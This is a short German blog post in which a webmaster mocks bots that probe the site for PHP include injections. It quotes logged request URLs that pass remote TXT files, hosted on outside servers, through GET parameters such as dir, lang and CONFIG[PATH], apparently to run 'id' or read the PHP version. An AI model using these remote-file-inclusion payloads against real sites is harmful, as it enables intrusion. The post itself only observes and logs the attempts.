Erbärmlich. Ständig versuchen irgendwelche Möchtegernhacker-Noobs bei mir Include-Injections zu finden. In den Statistiken taucht eine URL nach der anderen auf – TXT-Dateien die die Hacker versuchen über GET-Parameter bei mir einzuschleusen.
Auszug:
/projekte/webmaster-learning/tu…selfmade_*_Teil_1_de.html//login.php?dir=http://www.gr******e.com/phpauction/*********/idfeelcomz.txt??
/start.php?lang=http://www.stupidscif****/imag**v/special.txt??
/Report.htm/?pg=http://daemon1337.100webspace.n***lb??
/search.php?q=http://www.b*********tem.txt?
//login.php?dir=http://po******e.gob.mx/enlace/INCLUDES/gacl.class.txt??
/head.php?adresa=http://sf******ot/data/action/act.txt??
//order/login.php?svr_rootscript=http:/****kitamotor.com/xin/on.txt??????
/projekte/webmaster-learning/tu…selfmade_*_Teil_1_de.html/?CONFIG[PATH]=http://w****/bbs/id.txt??
Die meisten dieser URLs wollen nur den Konsolenbefehl “id” bei mir ausführen, manche sogar grandiose Sachen wie meine PHP-Version oder ähnliches. Viele liefern auch einfach einen 404. Die User-Agents sind alle entweder Firefox unter FreeBSD – oder libwww-perl. Bots also. Einfach nur erbärmlich.